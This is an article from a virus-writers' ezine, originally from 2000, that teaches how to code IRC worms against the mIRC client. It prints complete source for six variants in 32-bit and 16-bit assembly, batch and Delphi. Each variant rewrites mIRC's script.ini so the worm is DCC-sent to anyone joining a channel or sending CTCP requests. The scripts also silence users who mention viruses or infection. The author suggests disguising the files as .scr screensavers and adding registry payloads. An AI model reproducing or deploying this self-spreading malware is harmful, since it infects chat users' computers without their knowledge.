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G9N 1: IRC Worm, easy coding

eZine's profile picture
Published in 
G9N Magazine
 · 12 Mar 2022

..o( IRC Worm, easy codin )o..............................[G9N-01.03].. 
: :
: Brief Description: 16 n 32 asm, batch :
: G9N issue Date: May 2000 :
: Author: The Spy :

Some demostrations on how to code simple IRC Worms, fuckin mIRC.
__________ ________________________________ __________
IWD32.... 32 bit asm...................... 8 kb
IWD16.... 16 bit asm...................... 452 bytes
IWDBAT1.. a batch file without comments... 475 bytes
IWDBAT2.. a smaller batch file............ 187 bytes
IWDSCR1.. Delphi, usin inifiles........... 72 kb
IWDSCR2.. Delphi, not usin inifiles....... 40 kb

.::::. .::::: .:. .:. ::::. .::::. |.
::'':: ':. ::':':: ':: '' ':: ||.
::..:: '::. :: ' :: ::::: .::' ||"
::'':: ':. :: :: .:: .::' |"

:: :: :::::' :: :: ::::' :::::: "


; IRC.Worm.Demo32
; >- Uncommented
; >- Unfinished Optimization, but with optimization comments
; >- Worm Size: 8k (win32asm :/)
; >- Werkin Time: dunno exactly, may b minutes 8O (win32asm :\)
; Coded in 10/04/00 - Bs As - Argentina
; Bug Fix: 24/04/00, Small Fixes
; Author: The Spy
; Things to add:
; >- May b a mini-compress engine for data, may b not
; >- Encription for data
; >- Change Name Randomly, use .scr extension to fuck mirc 5.7
; To Compile:
; >- tasm32 /ml IWD32 ,,;
; >- tlink32 /Tpe /aa /c IWD32 , IWD32 ,, import32,

locals ; home vs away = local vs visitor, so im local, we play at locals!!
jumps ; do u like rave ?
.model flat,STDCALL ; flat n standard, too ugly

extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn DeleteFileA:PROC
extrn CreateFileA:PROC
extrn lstrcpyA:PROC
extrn WriteFile:PROC
extrn FindFirstFileA:PROC
extrn FindClose:PROC


FHandle dd ?

mIRC db 'C:\mirc',0
mIRC32 db 'C:\mirc32',0
ap db 'C:\archivos de programa\mirc',0
ap32 db 'C:\archivos de programa\mirc32',0
pf db 'C:\program files\mirc',0
pf32 db 'C:\program files\mirc32',0

autor db 'The Spy',0 ; for AV silly ppl
worm db 'IRC.Worm.Demo32',0
NBtsWrn dd ?
counta db 0
dir db 260 dup(0)
fdata db 316 dup(0)
daini db 'script.ini',0
dascr db 'IWD32.scr',0
script db '[script]',0,13,10
n0 db 'n0=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick ',0
dir0 db 281 dup(32)
n1 db 'n1=ON 1:TEXT:*script.ini*:#:/ignore $nick',13,10,0
n2 db 'n2=ON 1:TEXT:*script.ini*:?:/ignore $nick',13,10,0
n3 db 'n3=ON 1:TEXT:*infected*:#:/ignore $nick',13,10,0
n4 db 'n4=ON 1:TEXT:*infected*:?:/ignore $nick',13,10,0
n5 db 'n5=ON 1:TEXT:*viru*:#:/ignore $nick',13,10,0
n6 db 'n6=ON 1:TEXT:*viru*:?:/ignore $nick',13,10,0
n7 db 'n7=ON 1:TEXT:*worm*:#:/ignore $nick',13,10,0
n8 db 'n8=ON 1:TEXT:*worm*:?:/ignore $nick',13,10,0
n9 db 'n9=ON 1:TEXT:*IRC.Worm*:#:/ignore $nick',13,10,0
n10 db 'n10=ON 1:TEXT:*IRC.Worm*:?:/ignore $nick',13,10,0
n11 db 'n11=ON 1:TEXT:*LBV*:#:/ignore $nick',13,10,0
n12 db 'n12=ON 1:TEXT:*LBV*:?:/ignore $nick',13,10,0
n13 db 'n13=ON 1:TEXT:*send*:?:{ /dcc send $nick '
dir13 db 281 dup(32)
n14 db 'n14=ctcp 1:*PING*:{ /dcc send $nick '
dir14 db 281 dup(32)
n15 db 'n15=ctcp 1:*FINGER*:{ /dcc send $nick '
dir15 db 281 dup(32)
n16 db 'n16=ctcp 1:*TIME*:{ /dcc send $nick '
dir16 db 281 dup(32)
n17 db 'n17=ctcp 1:*VERSION*:{ /dcc send $nick '
dir17 db 281 dup(32)
n18 db 'n18=ctcp 1:*USERINFO*:{ /dcc send $nick '
dir18 db 281 dup(32)
n19 db 'n19=; IRC.Worm.Demo32 by The Spy',13,10,0

dcc db ' | /ignore $nick }',13,10,0


call daFFroutine
mov [counta],5
lea eax,mIRC
push eax
call SetCurrentDirectoryA
cmp eax,0
; jz ChuIsi
jnz otroche
call daFFroutine
cmp [counta],0
jz Exit
dec [counta]
cmp [counta],4
jz jmirc32
cmp [counta],3
jz jap
cmp [counta],2
jz jap32
cmp [counta],1
jz jpf
lea eax,pf32 ;if ecx=0 then
jmp sip
lea eax,pf
jmp sip
lea eax,ap
jmp sip
lea eax,ap32
jmp sip
lea eax,mIRC32
push eax
jmp here

push eax
call FindClose
lea eax,dir
push eax
push 260
call GetCurrentDirectoryA
cmp eax,0
jz Exit
lea eax,dir
push eax
lea eax,dir0
push eax
call lstrcpyA
lea edi,dir0
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA


lea eax,dir
push eax
lea eax,dir13
push eax
call lstrcpyA
lea edi,dir13
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

lea eax,dir
push eax
lea eax,dir14
push eax
call lstrcpyA
lea edi,dir14
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

lea eax,dir
push eax
lea eax,dir15
push eax
call lstrcpyA
lea edi,dir15
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

lea eax,dir
push eax
lea eax,dir16
push eax
call lstrcpyA
lea edi,dir16
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

lea eax,dir
push eax
lea eax,dir17
push eax
call lstrcpyA
lea edi,dir17
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

lea eax,dir
push eax
lea eax,dir18
push eax
call lstrcpyA
lea edi,dir18
xor eax,eax
call a_ver
lea eax,dcc
push eax
push edi
call lstrcpyA

;for optimization
;[word push offset dirxx]+322
;lea si,lea_edi_dir
;add word ptr [si],322
;jnz other

lea eax,daini
push eax
call DeleteFileA
push 0 ; i ve da idea to loop da pushes, but i ve c that Benny ve say that in
push 20h ; 29A #4, damn, he was more quick than me... who cares anyway hehe
push 1
push 0
push (1 or 2)
push 40000000h
lea eax,daini
push eax
call CreateFileA
cmp eax,-1
jz Exit
mov dword ptr [FHandle],eax
push 0
push offset NBtsWrn
mov ecx,offset dcc-offset script
push ecx
lea eax,script
push eax
push dword ptr [FHandle]
call WriteFile
push dword ptr [FHandle]
call CloseHandle
push 0
call ExitProcess

cmp al,byte ptr [edi]
jz da
inc edi
jmp a_ver

lea eax,fdata
push eax
lea eax,daini
push eax
call FindFirstFileA
cmp eax,-1
jnz doda

End ChuIsi


It checks for da common directories where mirc use to b installed,
where it founds a script.ini file, it fuck it constructin da correct
script for da directory where it must infect. Works fine, infectin da
first script.ini that it founds in da mirc's common directories.

.::::. .::::: .:. .:. :: .::::. |.
::'':: ':. ::':':: .::: ::' ||.
::..:: '::. :: ' :: :: ::.::. ||"

::'':: ':. :: :: :: ::' ': |"
:: :: :::::' :: :: :::: '::::' "

Now, let c a 16 bit one, that doesnt make da same things, for eg. it
infects c:\mirc only, n ve a nasty anti-tracin check included!
There is a lot of things that can b added to this worm, like change
da name, imagine a file called, nice uh? ;D


.model tiny
org 100h

cmp ax,bx
jnz gonp
cmp cx,dx
jz getout
mov ah,3bh
lea dx,mircdir
int 21h
jc getout

mov ah,3Ch
xor cx,cx
lea dx,comname
int 21h

xchg ax,bx

mov ah,40h
mov cx,(the_end-IWD16)
lea dx,IWD16
int 21h

call closef

mov ax,3D02h
lea dx,scriini
int 21h
jc getout

xchg ax,bx

call seekeof

xchg dx,ax

mov ax,4200h
sub dx,6
int 21h

mov ah,3Fh
mov cx,2
lea dx,mircdir
int 21h

mov ax,'ci'
cmp word ptr [mircdir],ax
je getout

call seekeof

mov ah,40h
mov cx,the_end-script
lea dx,script
int 21h
mov ah,3Eh
int 21h


mov ax,4202h
xor cx,cx
int 21h

mircdir db 'c:\mirc\',0
scriini db 'script.ini',0
comname db 'c:\mirc\',0
script db 13,10,'[script]',13,10
n0 db 'n0=; IRC Worm Demo16 by The Spy',13,10
n1 db 'n1=ON 1:JOIN:#:{ /if ( $nick != $me )'
db ' { /dcc send $nick $ | '
db '/ignore $nick }',13,10
n2 db 'n2=ON 1:TEXT:*IWD16*:*:/ignore $nick',13,10
n3 db 'n3=ON 1:TEXT:*Worm*:*:/ignore $nick',13,10
n4 db 'n4=ON 1:TEXT:*Virus*:*:/ignore $nick',13,10
n5 db 'n5=ON 1:TEXT:*infect*:*:/ignore $nick',13,10
zero db 0

end IWD16


.::::. .::::. :::::: .::::: :: :: |.
:: .: ::'':: :: :: :: :: ||.
:::::. ::..:: :: :: :::::: ||"
:: .: ::'':: :: :: :: :: |"

:::::' :: :: :: '::::: :: :: "

A shitty .bat that works fine (damn god! a few lines of a .bat to
build a irc worm...)


::REMove comments to make it 475 bytes small
@ctty nul.
::@ is echo off for da command next to
copy /y %0 c:\windows\system\IWDBAT.bat
echo n0=; DemoBAT IRC Worm by The Spy>c:\mirc\script.ini
::> sends output to a file (creates/overwrites da file)
echo n1=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick c:\windows\system\IWDBAT.bat }>>c:\mirc\script.ini
::>> appends output to the end of a file
echo n2=ON 1:TEXT:*virus*:*:/ignore $nick>>c:\mirc\script.ini
echo n3=ON 1:TEXT:*Worm*:*:/ignore $nick>>c:\mirc\script.ini
echo n4=ON 1:TEXT:*.bat*:*:/ignore $nick>>c:\mirc\script.ini
echo n5=ON 1:TEXT:*infect*:*:/ignore $nick>>c:\mirc\script.ini


n also if u want to save more bytes, chust use da .bat as da ini, its
a dirty way, but i works. U can make a smaller one, avoidin sign, a
batch file 188 bytes long, n if u avoid to set ctty nul, u can obtain a
smaller one, 176 bytes


@ctty nul.
@copy /y %0 c:\windows\system\2.bat
@copy /y %0 c:\mirc\script.ini
n0=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick c:\windows\system\2.bat }
n1=;The Spy


:::::. .::::. :: :::::. :: :: :: |.
:: ': ::'':: :: :: :: :: :: :: ||.
:: : ::..:' :: :::::' :::::: :: ||"

:: .: ::' :: :: :: :: :: |"
:::::' '::::: '::::: :: :: :: :: "

It will modify mirc.ini, i know that change pirch's events.ini isnt
nothin dificult, but i think that 72 k, r enough.

--[DemoSCR Worm using inifiles]---8<-----------------------------------

DemoSCR Worm by The Spy
Version: using inifiles
Coded in March 6th of 2000
Size: 72 kb

program DemoSCR_Worm_using_inifiles;
uses sysutils,inifiles;
var s,v:string;ini:tinifile;
s:='DemoSCR Worm';
s:='The Spy';
s:=GetCurrentDir; // c:\mirc\download
v:=GetCurrentDir; // eg. c:\mirc
Ini.WriteString('Script','n0','ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
Ini.WriteString('Script','n1','ON 1:TEXT:*script.ini*:#:/ignore $nick');
Ini.WriteString('Script','n2','ON 1:TEXT:*script.ini*:?:/ignore $nick');
Ini.WriteString('Script','n3','ON 1:TEXT:*infect*:#:/ignore $nick');
Ini.WriteString('Script','n4','ON 1:TEXT:*infect*:?:/ignore $nick');
Ini.WriteString('Script','n5','ON 1:TEXT:*viru*:#:/ignore $nick');
Ini.WriteString('Script','n6','ON 1:TEXT:*viru*:?:/ignore $nick');
Ini.WriteString('Script','n7','ON 1:TEXT:*worm*:#:/ignore $nick');
Ini.WriteString('Script','n8','ON 1:TEXT:*worm*:?:/ignore $nick');
Ini.WriteString('Script','n9','ON 1:TEXT:*DemoSCR*:#:/ignore $nick');
Ini.WriteString('Script','n10','ON 1:TEXT:*DemoSCR*:?:/ignore $nick');
Ini.WriteString('Script','n11','ON 1:TEXT:*SCR*:#:/ignore $nick');
Ini.WriteString('Script','n12','ON 1:TEXT:*SCR*:?:/ignore $nick');
Ini.WriteString('Script','n13','ON 1:TEXT:*send*:*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
Ini.WriteString('Script','n14','ctcp 1:*PING*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
Ini.WriteString('Script','n15','ctcp 1:*FINGER*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick | halt }');
Ini.WriteString('Script','n16','ctcp 1:*TIME*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
Ini.WriteString('Script','n17','ctcp 1:*VERSION*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
Ini.WriteString('Script','n18','ctcp 1:*USERINFO*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick | halt }');
Ini.WriteString('Script','n19','; DemoSCR Worm by The Spy');

--[DemoSCR Worm using inifiles]---8<-----------------------------------

Damn, 72k r enough n too much, let me code some things.

--[DemoSCR Worm not usin inifiles]8<-----------------------------------

DemoSCR Worm by The Spy
Version: not usin inifiles
Coded in March 6th of 2000
Size: 42 kb

program DemoSCR_Worm_not_usin_inifiles;
uses SysUtils;
var ft:textfile;s,v:string;flag:boolean;
s:='DemoSCR Worm';
s:='The Spy';
s:=GetCurrentDir; // c:\mirc\download
v:=GetCurrentDir; // c:\mirc
if v='[script]' then flag:=true;
if flag then break;
until eof(ft);
if not flag then writeln(ft,'[script]');
writeln(ft,'n0=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
writeln(ft,'n1=ON 1:TEXT:*script.ini*:#:/ignore $nick');
writeln(ft,'n2=ON 1:TEXT:*script.ini*:?:/ignore $nick');
writeln(ft,'n3=ON 1:TEXT:*infect*:#:/ignore $nick');
writeln(ft,'n4=ON 1:TEXT:*infect*:?:/ignore $nick');
writeln(ft,'n5=ON 1:TEXT:*viru*:#:/ignore $nick');
writeln(ft,'n6=ON 1:TEXT:*viru*:?:/ignore $nick');
writeln(ft,'n7=ON 1:TEXT:*worm*:#:/ignore $nick');
writeln(ft,'n8=ON 1:TEXT:*worm*:?:/ignore $nick');
writeln(ft,'n9=ON 1:TEXT:*DemoSCR*:#:/ignore $nick');
writeln(ft,'n10=ON 1:TEXT:*DemoSCR*:?:/ignore $nick');
writeln(ft,'n11=ON 1:TEXT:*SCR*:#:/ignore $nick');
writeln(ft,'n12=ON 1:TEXT:*SCR*:?:/ignore $nick');
writeln(ft,'n13=ON 1:TEXT:*send*:?:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
writeln(ft,'n14=ctcp 1:*PING*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
writeln(ft,'n15=ctcp 1:*FINGER*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick | halt }');
writeln(ft,'n16=ctcp 1:*TIME*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
writeln(ft,'n17=ctcp 1:*VERSION*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick }');
writeln(ft,'n18=ctcp 1:*USERINFO*:{ /dcc send $nick '+s+'\freedemo.scr | /ignore $nick | halt }');
writeln(ft,'n19=; DemoSCR Worm by The Spy');
flush(ft); // b sure

--[DemoSCR Worm not usin inifiles]8<-----------------------------------

Well, this version, ve no da dcc invisible feature, but i ve save
30 kb, that is a lot. A lot of things can b added like change it name
from freedemo.scr to MyNewDemo.scr or demo.scr hehe, or also a search
routine, to find da mirc's directory, include an icon, etc.
But da funny one, may b a payload like change da mIRC's Reg at
HKEY_USERS\.Default\Software\mIRC\name for eg. simply callin da
TRegistry.WriteString procedure.

The Spy,
an (old, weird, mad, sick n damn) asm coder

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